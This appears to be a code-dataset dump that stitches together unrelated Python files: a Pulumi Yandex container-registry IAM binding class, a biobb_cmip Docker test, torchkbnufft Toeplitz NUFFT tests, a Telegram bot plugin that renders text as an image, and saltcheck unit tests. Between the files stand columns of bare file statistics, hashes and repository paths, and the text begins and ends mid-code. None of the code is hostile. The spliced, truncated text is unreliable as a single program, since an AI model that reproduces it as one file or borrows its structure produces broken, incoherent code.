your_registry = yandex.ContainerRegistry("your-registry", folder_id="your-folder-id")
puller = yandex.ContainerRegistryIamBinding("puller",
registry_id=your_registry.id,
role="container-registry.images.puller",
members=["system:allUsers"])
```
## Import
IAM binding imports use space-delimited identifiers; first the resource in question and then the role. These bindings can be imported using the `registry_id` and role, e.g.
```sh
$ pulumi import yandex:index/containerRegistryIamBinding:ContainerRegistryIamBinding puller "registry_id container-registry.images.puller"
```
:param str resource_name: The name of the resource.
:param ContainerRegistryIamBindingArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ContainerRegistryIamBindingArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
registry_id: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
sleep_after: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ContainerRegistryIamBindingArgs.__new__(ContainerRegistryIamBindingArgs)
if members is None and not opts.urn:
raise TypeError("Missing required property 'members'")
__props__.__dict__["members"] = members
if registry_id is None and not opts.urn:
raise TypeError("Missing required property 'registry_id'")
__props__.__dict__["registry_id"] = registry_id
if role is None and not opts.urn:
raise TypeError("Missing required property 'role'")
__props__.__dict__["role"] = role
__props__.__dict__["sleep_after"] = sleep_after
super(ContainerRegistryIamBinding, __self__).__init__(
'yandex:index/containerRegistryIamBinding:ContainerRegistryIamBinding',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
registry_id: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
sleep_after: Optional[pulumi.Input[int]] = None) -> 'ContainerRegistryIamBinding':
"""
Get an existing ContainerRegistryIamBinding resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] members: Identities that will be granted the privilege in `role`.
Each entry can have one of the following values:
* **userAccount:{user_id}**: A unique user ID that represents a specific Yandex account.
* **serviceAccount:{service_account_id}**: A unique service account ID.
* **system:{allUsers|allAuthenticatedUsers}**: see [system groups](https://cloud.yandex.com/docs/iam/concepts/access-control/system-group)
:param pulumi.Input[str] registry_id: The [Yandex Container Registry](https://cloud.yandex.com/docs/container-registry/) ID to apply a binding to.
:param pulumi.Input[str] role: The role that should be applied. See [roles](https://cloud.yandex.com/docs/container-registry/security/).
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ContainerRegistryIamBindingState.__new__(_ContainerRegistryIamBindingState)
__props__.__dict__["members"] = members
__props__.__dict__["registry_id"] = registry_id
__props__.__dict__["role"] = role
__props__.__dict__["sleep_after"] = sleep_after
return ContainerRegistryIamBinding(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def members(self) -> pulumi.Output[Sequence[str]]:
"""
Identities that will be granted the privilege in `role`.
Each entry can have one of the following values:
* **userAccount:{user_id}**: A unique user ID that represents a specific Yandex account.
* **serviceAccount:{service_account_id}**: A unique service account ID.
* **system:{allUsers|allAuthenticatedUsers}**: see [system groups](https://cloud.yandex.com/docs/iam/concepts/access-control/system-group)
"""
return pulumi.get(self, "members")
@property
@pulumi.getter(name="registryId")
def registry_id(self) -> pulumi.Output[str]:
"""
The [Yandex Container Registry](https://cloud.yandex.com/docs/container-registry/) ID to apply a binding to.
"""
return pulumi.get(self, "registry_id")
@property
@pulumi.getter
def role(self) -> pulumi.Output[str]:
"""
The role that should be applied. See [roles](https://cloud.yandex.com/docs/container-registry/security/).
"""
return pulumi.get(self, "role")
@property
@pulumi.getter(name="sleepAfter")
def sleep_after(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "sleep_after")
| 47.678873
| 180
| 0.656268
| 1,947
| 16,926
| 5.529019
| 0.103236
| 0.066419
| 0.053321
| 0.037065
| 0.809382
| 0.794426
| 0.777984
| 0.7464
| 0.741663
| 0.735439
| 0
| 0.000077
| 0.233369
| 16,926
| 354
| 181
| 47.813559
| 0.829531
| 0.452204
| 0
| 0.613636
| 1
| 0
| 0.093335
| 0.018474
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153409
| false
| 0.005682
| 0.028409
| 0.017045
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c78c69e262c3407eb19536171542a6f823373179
| 2,822
|
py
|
Python
|
biobb_cmip/test/unitests/test_cmip/test_cmip_docker.py
|
bioexcel/biobb_cmip
|
ee732a67e7e9a7d924ca2c8ec56b69f3e367861a
|
[
"Apache-2.0"
] | null | null | null |
biobb_cmip/test/unitests/test_cmip/test_cmip_docker.py
|
bioexcel/biobb_cmip
|
ee732a67e7e9a7d924ca2c8ec56b69f3e367861a
|
[
"Apache-2.0"
] | 9
|
2021-05-14T10:10:02.000Z
|
2022-01-19T14:35:20.000Z
|
biobb_cmip/test/unitests/test_cmip/test_cmip_docker.py
|
bioexcel/biobb_cmip
|
ee732a67e7e9a7d924ca2c8ec56b69f3e367861a
|
[
"Apache-2.0"
] | null | null | null |
from biobb_common.tools import test_fixtures as fx
from biobb_cmip.cmip.cmip import cmip
# class TestCmipMipDocker():
# def setUp(self):
# fx.test_setup(self, 'cmip_mip_docker')
#
# def tearDown(self):
# #pass
# fx.test_teardown(self)
#
# def test_cmip_mip_docker(self):
# cmip(properties=self.properties, **self.paths)
# assert fx.not_empty(self.paths['output_cube_path'])
# assert fx.not_empty(self.paths['output_grd_path'])
# assert fx.equal(self.paths['output_grd_path'], self.paths['ref_output_cmip_mip_grd_path'])
# assert fx.equal(self.paths['output_cube_path'], self.paths['ref_output_cmip_mip_cube_path'])
class TestCmipDockingDocker():
def setUp(self):
fx.test_setup(self, 'cmip_docking_docker')
def tearDown(self):
pass
#fx.test_teardown(self)
def test_cmip_docking_docker(self):
cmip(properties=self.properties, **self.paths)
assert fx.not_empty(self.paths['output_pdb_path'])
assert fx.not_empty(self.paths['output_grd_path'])
assert fx.not_empty(self.paths['output_rst_path'])
# Can not compare PDB files formed excluvely by HETATM
#assert fx.equal(self.paths['output_pdb_path'], self.paths['ref_output_cmip_docking_pdb_path'])
# GRD differs between executions
#assert fx.equal(self.paths['output_grd_path'], self.paths['ref_output_cmip_docking_grd_path'])
# RST differs between executions
#assert fx.equal(self.paths['output_rst_path'], self.paths['ref_output_cmip_docking_rst_path'])
# class TestCmipEnergyDocker():
# def setUp(self):
# fx.test_setup(self, 'cmip_energy_docker')
#
# def tearDown(self):
# #pass
# fx.test_teardown(self)
#
# def test_cmip_mip_docker(self):
# cmip(properties=self.properties, **self.paths)
# assert fx.not_empty(self.paths['output_cube_path'])
# assert fx.not_empty(self.paths['output_grd_path'])
# assert fx.equal(self.paths['output_grd_path'], self.paths['ref_output_cmip_mip_grd_path'])
# assert fx.equal(self.paths['output_cube_path'], self.paths['ref_output_cmip_mip_cube_path'])
#
# class TestCmipSolvationDocker():
# def setUp(self):
# fx.test_setup(self, 'cmip_solvation_docker')
#
# def tearDown(self):
# #pass
# fx.test_teardown(self)
#
# def test_cmip_mip_docker(self):
# cmip(properties=self.properties, **self.paths)
# assert fx.not_empty(self.paths['output_cube_path'])
# assert fx.not_empty(self.paths['output_grd_path'])
# assert fx.equal(self.paths['output_grd_path'], self.paths['ref_output_cmip_mip_grd_path'])
# assert fx.equal(self.paths['output_cube_path'], self.paths['ref_output_cmip_mip_cube_path'])
| 40.898551
| 103
| 0.683203
| 386
| 2,822
| 4.681347
| 0.124352
| 0.1544
| 0.149419
| 0.07969
| 0.852241
| 0.843387
| 0.827892
| 0.787493
| 0.706143
| 0.664084
| 0
| 0
| 0.185684
| 2,822
| 69
| 104
| 40.898551
| 0.786336
| 0.763643
| 0
| 0
| 0
| 0
| 0.104235
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| false
| 0.083333
| 0.166667
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
402800afa33e2a04e2fcc498730c7b3655756f4e
| 5,241
|
py
|
Python
|
tests/test_toeplitz.py
|
zaccharieramzi/torchkbnufft
|
37e5808ab73ddb52cbd4655f3d7fd6273b3dd89a
|
[
"MIT"
] | 1
|
2021-04-16T15:41:28.000Z
|
2021-04-16T15:41:28.000Z
|
tests/test_toeplitz.py
|
edongdongchen/torchkbnufft
|
f9ac098c8f122026e8e8866828cb5957118a5679
|
[
"MIT"
] | null | null | null |
tests/test_toeplitz.py
|
edongdongchen/torchkbnufft
|
f9ac098c8f122026e8e8866828cb5957118a5679
|
[
"MIT"
] | null | null | null |
import sys
import numpy as np
import torch
from torchkbnufft import (
AdjKbNufft, AdjMriSenseNufft, KbNufft, MriSenseNufft, ToepNufft,
ToepSenseNufft)
from torchkbnufft.math import inner_product
from torchkbnufft.nufft.toep_functions import calc_toep_kernel
def test_toeplitz_nufft_2d(params_2d, testing_tol, testing_dtype, device_list):
dtype = testing_dtype
# this tolerance looks really bad, but toep struggles with random traj
# for radial it's more like 1e-06
norm_tol = 1e-3
im_size = params_2d['im_size']
numpoints = params_2d['numpoints']
x = params_2d['x']
y = params_2d['y']
ktraj = params_2d['ktraj']
for device in device_list:
x = x.detach().to(dtype=dtype, device=device)
y = y.detach().to(dtype=dtype, device=device)
ktraj = ktraj.detach().to(dtype=dtype, device=device)
kbnufft_ob = KbNufft(
im_size=im_size,
numpoints=numpoints
).to(dtype=dtype, device=device)
adjkbnufft_ob = AdjKbNufft(
im_size=im_size,
numpoints=numpoints
).to(dtype=dtype, device=device)
toep_ob = ToepNufft()
kern = calc_toep_kernel(adjkbnufft_ob, ktraj)
normal_forw = adjkbnufft_ob(kbnufft_ob(x, ktraj), ktraj)
toep_forw = toep_ob(x, kern)
diff = torch.norm(normal_forw - toep_forw) / torch.norm(normal_forw)
assert diff < norm_tol
def test_toeplitz_mrisensenufft_2d(params_2d, testing_tol, testing_dtype, device_list):
dtype = testing_dtype
# this tolerance looks really bad, but toep struggles with random traj
# for radial it's more like 1e-06
norm_tol = 1e-3
im_size = params_2d['im_size']
numpoints = params_2d['numpoints']
x = params_2d['x']
y = params_2d['y']
ktraj = params_2d['ktraj']
smap = params_2d['smap']
for device in device_list:
x = x.detach().to(dtype=dtype, device=device)
y = y.detach().to(dtype=dtype, device=device)
ktraj = ktraj.detach().to(dtype=dtype, device=device)
sensenufft_ob = MriSenseNufft(
smap=smap,
im_size=im_size,
numpoints=numpoints
).to(dtype=dtype, device=device)
adjsensenufft_ob = AdjMriSenseNufft(
smap=smap,
im_size=im_size,
numpoints=numpoints
).to(dtype=dtype, device=device)
toep_ob = ToepSenseNufft(smap=smap).to(dtype=dtype, device=device)
kern = calc_toep_kernel(adjsensenufft_ob, ktraj)
normal_forw = adjsensenufft_ob(sensenufft_ob(x, ktraj), ktraj)
toep_forw = toep_ob(x, kern)
diff = torch.norm(normal_forw - toep_forw) / torch.norm(normal_forw)
assert diff < norm_tol
def test_toeplitz_nufft_3d(params_3d, testing_tol, testing_dtype, device_list):
dtype = testing_dtype
# this tolerance looks really bad, but toep struggles with random traj
# for radial it's more like 1e-06
norm_tol = 1e-1
im_size = params_3d['im_size']
numpoints = params_3d['numpoints']
x = params_3d['x']
y = params_3d['y']
ktraj = params_3d['ktraj']
for device in device_list:
x = x.detach().to(dtype=dtype, device=device)
y = y.detach().to(dtype=dtype, device=device)
ktraj = ktraj.detach().to(dtype=dtype, device=device)
kbnufft_ob = KbNufft(
im_size=im_size,
numpoints=numpoints
).to(dtype=dtype, device=device)
adjkbnufft_ob = AdjKbNufft(
im_size=im_size,
numpoints=numpoints
).to(dtype=dtype, device=device)
toep_ob = ToepNufft()
kern = calc_toep_kernel(adjkbnufft_ob, ktraj)
normal_forw = adjkbnufft_ob(kbnufft_ob(x, ktraj), ktraj)
toep_forw = toep_ob(x, kern)
diff = torch.norm(normal_forw - toep_forw) / torch.norm(normal_forw)
assert diff < norm_tol
def test_toeplitz_mrisensenufft_3d(params_3d, testing_tol, testing_dtype, device_list):
dtype = testing_dtype
# this tolerance looks really bad, but toep struggles with random traj
# for radial it's more like 1e-06
norm_tol = 1e-1
im_size = params_3d['im_size']
numpoints = params_3d['numpoints']
x = params_3d['x']
y = params_3d['y']
ktraj = params_3d['ktraj']
smap = params_3d['smap']
for device in device_list:
x = x.detach().to(dtype=dtype, device=device)
y = y.detach().to(dtype=dtype, device=device)
ktraj = ktraj.detach().to(dtype=dtype, device=device)
sensenufft_ob = MriSenseNufft(
smap=smap,
im_size=im_size,
numpoints=numpoints
).to(dtype=dtype, device=device)
adjsensenufft_ob = AdjMriSenseNufft(
smap=smap,
im_size=im_size,
numpoints=numpoints
).to(dtype=dtype, device=device)
toep_ob = ToepSenseNufft(smap=smap).to(dtype=dtype, device=device)
kern = calc_toep_kernel(adjsensenufft_ob, ktraj)
normal_forw = adjsensenufft_ob(sensenufft_ob(x, ktraj), ktraj)
toep_forw = toep_ob(x, kern)
diff = torch.norm(normal_forw - toep_forw) / torch.norm(normal_forw)
assert diff < norm_tol
| 30.47093
| 87
| 0.646442
| 694
| 5,241
| 4.665706
| 0.103746
| 0.088326
| 0.081532
| 0.122298
| 0.917542
| 0.917542
| 0.917542
| 0.917542
| 0.917542
| 0.917542
| 0
| 0.012762
| 0.252433
| 5,241
| 171
| 88
| 30.649123
| 0.81368
| 0.076894
| 0
| 0.881356
| 0
| 0
| 0.020708
| 0
| 0
| 0
| 0
| 0
| 0.033898
| 1
| 0.033898
| false
| 0
| 0.050847
| 0
| 0.084746
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
407cca5ebe1a37cca51d5a0552fea66a24832ef9
| 4,774
|
py
|
Python
|
plugins/prints.py
|
gorpoorko/Bot-Tcxs-Heroku
|
b272b1c491ec2bea14e65f1d4e0c96c23bc2d815
|
[
"FTL"
] | 1
|
2020-12-11T10:15:46.000Z
|
2020-12-11T10:15:46.000Z
|
plugins/prints.py
|
gorpoorko/Bot-Tcxs-Heroku
|
b272b1c491ec2bea14e65f1d4e0c96c23bc2d815
|
[
"FTL"
] | null | null | null |
plugins/prints.py
|
gorpoorko/Bot-Tcxs-Heroku
|
b272b1c491ec2bea14e65f1d4e0c96c23bc2d815
|
[
"FTL"
] | 1
|
2021-06-22T19:27:38.000Z
|
2021-06-22T19:27:38.000Z
|
# -*- coding: utf-8 -*-
#███╗ ███╗ █████╗ ███╗ ██╗██╗ ██████╗ ██████╗ ███╗ ███╗██╗ ██████╗
#████╗ ████║██╔══██╗████╗ ██║██║██╔════╝██╔═══██╗████╗ ████║██║██╔═══██╗
#██╔████╔██║███████║██╔██╗ ██║██║██║ ██║ ██║██╔████╔██║██║██║ ██║
#██║╚██╔╝██║██╔══██║██║╚██╗██║██║██║ ██║ ██║██║╚██╔╝██║██║██║ ██║
#██║ ╚═╝ ██║██║ ██║██║ ╚████║██║╚██████╗╚██████╔╝██║ ╚═╝ ██║██║╚██████╔╝
#╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═════╝
# [+] @GorpoOrko 2020 - Telegram Bot and Personal Assistant [+]
# | TCXS Project Hacker Team - https://tcxsproject.com.br |
# | Telegram: @GorpoOrko Mail:gorpoorko@protonmail.com |
# [+] Github Gorpo Dev: https://github.com/gorpo [+]
import os
from PIL import Image, ImageDraw, ImageFont
from config import bot
async def prints(msg):
if msg.get('text'):
if msg['text'].lower() == 'print' and msg.get('reply_to_message'):
texto_repetido = msg['reply_to_message']['text']
text = msg['reply_to_message']['text']
try:
await bot.sendMessage(msg['chat']['id'], '`Tirando print...`','markdown', reply_to_message_id=msg['message_id'])
img = Image.new('RGBA', (1000, 1000), (255, 255, 255)) #ele cria esta imagem para nada mas é necessario ela sera substituida, queremos pegar o tamanho do texto
draw = ImageDraw.Draw(img)
text_size = draw.textsize(text, ImageFont.truetype("arial.ttf", 30))
# print(text_size)
img2 = Image.new('RGBA', text_size, (255, 255, 255))
draw2 = ImageDraw.Draw(img2)
draw2.text((1, 1), text[0:45], (0, 0, 0), ImageFont.truetype("arial.ttf", 30))
img2.save('arquivos/pil_text.png')
await bot.sendPhoto(msg['chat']['id'],photo=open('arquivos/pil_text.png','rb'), reply_to_message_id=msg['message_id'])
os.remove('arquivos/pil_text.png')
except Exception as e:
await bot.sendMessage(msg['chat']['id'], '`diminua seu texto, tente novamente`', 'markdown',
reply_to_message_id=msg['message_id'])
pass
if msg['text'].startswith('/print') or msg['text'].startswith('!print'):
text = msg['text'][6:]
try:
await bot.sendMessage(msg['chat']['id'], '`Tirando print...`','markdown', reply_to_message_id=msg['message_id'])
img = Image.new('RGBA', (1000, 1000), (255, 255, 255)) #ele cria esta imagem para nada mas é necessario ela sera substituida, queremos pegar o tamanho do texto
draw = ImageDraw.Draw(img)
text_size = draw.textsize(text, ImageFont.truetype("arial.ttf", 30))
# print(text_size)
img2 = Image.new('RGBA', text_size, (255, 255, 255))
draw2 = ImageDraw.Draw(img2)
draw2.text((1, 1), text[0:45], (0, 0, 0), ImageFont.truetype("arial.ttf", 30))
img2.save('arquivos/pil_text.png')
await bot.sendPhoto(msg['chat']['id'],photo=open('arquivos/pil_text.png','rb'), reply_to_message_id=msg['message_id'])
os.remove('arquivos/pil_text.png')
except Exception as e:
await bot.sendMessage(msg['chat']['id'], '`diminua seu texto, tente novamente`', 'markdown',
reply_to_message_id=msg['message_id'])
pass
if msg['text'].startswith('print') and not msg.get('reply_to_message'):
text = msg['text'][5:]
try:
await bot.sendMessage(msg['chat']['id'], '`Tirando print...`','markdown', reply_to_message_id=msg['message_id'])
img = Image.new('RGBA', (1000, 1000), (255, 255, 255)) #ele cria esta imagem para nada mas é necessario ela sera substituida, queremos pegar o tamanho do texto
draw = ImageDraw.Draw(img)
text_size = draw.textsize(text, ImageFont.truetype("arial.ttf", 30))
# print(text_size)
img2 = Image.new('RGBA', text_size, (255, 255, 255))
draw2 = ImageDraw.Draw(img2)
draw2.text((2, 1), text[0:45], (0, 0, 0), ImageFont.truetype("arial.ttf", 25))
img2.save('arquivos/pil_text.png')
await bot.sendPhoto(msg['chat']['id'],photo=open('arquivos/pil_text.png','rb'), reply_to_message_id=msg['message_id'])
os.remove('arquivos/pil_text.png')
except Exception as e:
await bot.sendMessage(msg['chat']['id'], '`diminua seu texto, tente novamente`', 'markdown', reply_to_message_id=msg['message_id'])
pass
| 58.938272
| 176
| 0.512987
| 579
| 4,774
| 4.747841
| 0.227979
| 0.058931
| 0.066206
| 0.052383
| 0.736995
| 0.707166
| 0.707166
| 0.707166
| 0.707166
| 0.707166
| 0
| 0.039047
| 0.270423
| 4,774
| 80
| 177
| 59.675
| 0.645995
| 0.225178
| 0
| 0.75
| 0
| 0
| 0.203533
| 0.051359
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.053571
| 0.053571
| 0
| 0.053571
| 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
4099cb94ac90bc851b0afada7de57bb9ee34b3dc
| 17,214
|
py
|
Python
|
tests/unit/modules/test_saltcheck.py
|
byteskeptical/salt
|
637fe0b04f38b2274191b005d73b3c6707d7f400
|
[
"Apache-2.0"
] | 5
|
2018-05-01T20:51:14.000Z
|
2021-11-09T05:43:00.000Z
|
tests/unit/modules/test_saltcheck.py
|
byteskeptical/salt
|
637fe0b04f38b2274191b005d73b3c6707d7f400
|
[
"Apache-2.0"
] | 12
|
2015-04-15T22:17:42.000Z
|
2016-03-22T08:46:27.000Z
|
tests/unit/modules/test_saltcheck.py
|
byteskeptical/salt
|
637fe0b04f38b2274191b005d73b3c6707d7f400
|
[
"Apache-2.0"
] | 7
|
2017-09-29T18:49:53.000Z
|
2021-11-09T05:42:49.000Z
|
# -*- coding: utf-8 -*-
'''Unit test for saltcheck execution module'''
# Import Python libs
from __future__ import absolute_import, unicode_literals, print_function
import os.path
try:
import salt.modules.saltcheck as saltcheck
import salt.config
import salt.syspaths as syspaths
except:
raise
# Import Salt Testing Libs
try:
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import skipIf, TestCase
from tests.support.mock import (
MagicMock,
patch,
NO_MOCK,
NO_MOCK_REASON
)
except:
raise
@skipIf(NO_MOCK, NO_MOCK_REASON)
class LinuxSysctlTestCase(TestCase, LoaderModuleMockMixin):
'''
TestCase for salt.modules.saltcheck module
'''
def setup_loader_modules(self):
# Setting the environment to be local
local_opts = salt.config.minion_config(
os.path.join(syspaths.CONFIG_DIR, 'minion'))
local_opts['file_client'] = 'local'
local_opts['conf_file'] = '/etc/salt/minion'
patcher = patch('salt.config.minion_config',
MagicMock(return_value=local_opts))
patcher.start()
self.addCleanup(patcher.stop)
return {saltcheck: {'__opts__': local_opts}}
def test_call_salt_command(self):
'''test simple test.echo module'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'sys.list_modules': MagicMock(return_value=['module1']),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
returned = sc_instance._call_salt_command(fun="test.echo", args=['hello'], kwargs=None)
self.assertEqual(returned, 'hello')
def test_update_master_cache(self):
'''test master cache'''
self.assertTrue(saltcheck.update_master_cache)
def test_call_salt_command2(self):
'''test simple test.echo module again'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'sys.list_modules': MagicMock(return_value=['module1']),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
returned = sc_instance._call_salt_command(fun="test.echo", args=['hello'], kwargs=None)
self.assertNotEqual(returned, 'not-hello')
def test__assert_equal1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = {'a': 1, 'b': 2}
bbb = {'a': 1, 'b': 2}
mybool = sc_instance._SaltCheck__assert_equal(aaa, bbb)
self.assertTrue(mybool)
def test__assert_equal2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_equal(False, True)
self.assertNotEqual(mybool, True)
def test__assert_not_equal1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = {'a': 1, 'b': 2}
bbb = {'a': 1, 'b': 2, 'c': 3}
mybool = sc_instance._SaltCheck__assert_not_equal(aaa, bbb)
self.assertTrue(mybool)
def test__assert_not_equal2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = {'a': 1, 'b': 2}
bbb = {'a': 1, 'b': 2}
mybool = sc_instance._SaltCheck__assert_not_equal(aaa, bbb)
self.assertNotEqual(mybool, True)
def test__assert_true1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_equal(True, True)
self.assertTrue(mybool)
def test__assert_true2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_equal(False, True)
self.assertNotEqual(mybool, True)
def test__assert_false1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_false(False)
self.assertTrue(mybool)
def test__assert_false2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
mybool = sc_instance._SaltCheck__assert_false(True)
self.assertNotEqual(mybool, True)
def test__assert_in1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = "bob"
mylist = ['alice', 'bob', 'charles', 'dana']
mybool = sc_instance._SaltCheck__assert_in(aaa, mylist)
self.assertTrue(mybool, True)
def test__assert_in2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = "elaine"
mylist = ['alice', 'bob', 'charles', 'dana']
mybool = sc_instance._SaltCheck__assert_in(aaa, mylist)
self.assertNotEqual(mybool, True)
def test__assert_not_in1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = "elaine"
mylist = ['alice', 'bob', 'charles', 'dana']
mybool = sc_instance._SaltCheck__assert_not_in(aaa, mylist)
self.assertTrue(mybool, True)
def test__assert_not_in2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = "bob"
mylist = ['alice', 'bob', 'charles', 'dana']
mybool = sc_instance._SaltCheck__assert_not_in(aaa, mylist)
self.assertNotEqual(mybool, True)
def test__assert_greater1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 110
bbb = 100
mybool = sc_instance._SaltCheck__assert_greater(aaa, bbb)
self.assertTrue(mybool, True)
def test__assert_greater2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 100
bbb = 110
mybool = sc_instance._SaltCheck__assert_greater(aaa, bbb)
self.assertNotEqual(mybool, True)
def test__assert_greater3(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 100
bbb = 100
mybool = sc_instance._SaltCheck__assert_greater(aaa, bbb)
self.assertNotEqual(mybool, True)
def test__assert_greater_equal1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 110
bbb = 100
mybool = sc_instance._SaltCheck__assert_greater_equal(aaa, bbb)
self.assertTrue(mybool, True)
def test__assert_greater_equal2(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 100
bbb = 110
mybool = sc_instance._SaltCheck__assert_greater_equal(aaa, bbb)
self.assertNotEqual(mybool, True)
def test__assert_greater_equal3(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
'cp.cache_master': MagicMock(return_value=[True])
}):
sc_instance = saltcheck.SaltCheck()
aaa = 100
bbb = 100
mybool = sc_instance._SaltCheck__assert_greater_equal(aaa, bbb)
self.assertEqual(mybool, 'Pass')
def test__assert_less1(self):
'''test'''
with patch.dict(saltcheck.__salt__, {'config.get': MagicMock(return_value=True),
